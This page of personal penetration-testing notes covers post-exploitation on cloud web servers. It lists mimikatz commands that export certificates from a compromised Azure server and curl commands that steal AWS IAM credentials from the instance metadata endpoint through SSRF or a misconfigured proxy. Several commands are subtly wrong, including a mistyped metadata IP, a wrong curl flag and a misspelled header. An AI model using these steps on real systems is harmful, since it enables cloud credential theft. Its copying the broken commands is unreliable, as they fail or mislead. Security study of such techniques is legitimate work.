cloud-provider-web-servers :: My notes and snippets

> Notes > Hacking Methodology > External > Post Exploit > cloud-provider-web-servers

Cloud provider web servers

Cloud provider web servers have some special things you might not have on your ‘normal’ webserver.

Azure windows webserver

If you are able to compromise an azure server you might be able to use mimikatz to extract certificates and try to authenticitate to Azure with them.

crypto::capi
privilege::debug
crypto::cng
crypto::certificates /systemstore:local_machine/store:my /export

AWS

Instance Metadata

Cloud server hosted on services like EC2 need a way to orient themselves. Therefore a metadata endpoint was created that runs at 169.254.169.254. This can contain access/secrets keys to AWS and IAM credentials.

This should be reachable from localhost, can be abused after server compromise or SSRF.

IAM credentials are stored here

http://139.254.169.254/latest/meta-data/iam/security-credentials/<IAM ROLE NAME>

Can be hit externally if nginx is misconfigured on AWS

curl --proxy host.domain.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo

AWS EC2 Instance Metadata service Version 2 (IMDSv2)

Updated in november 2019. v2 requires a PUT request that response with a token.

TOKEN=`curl -X PUT "http://139.254.169.254/latest/api/token" -h "X-aws-ec2-metadata-token-ttl-secconds: 21600"`

curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"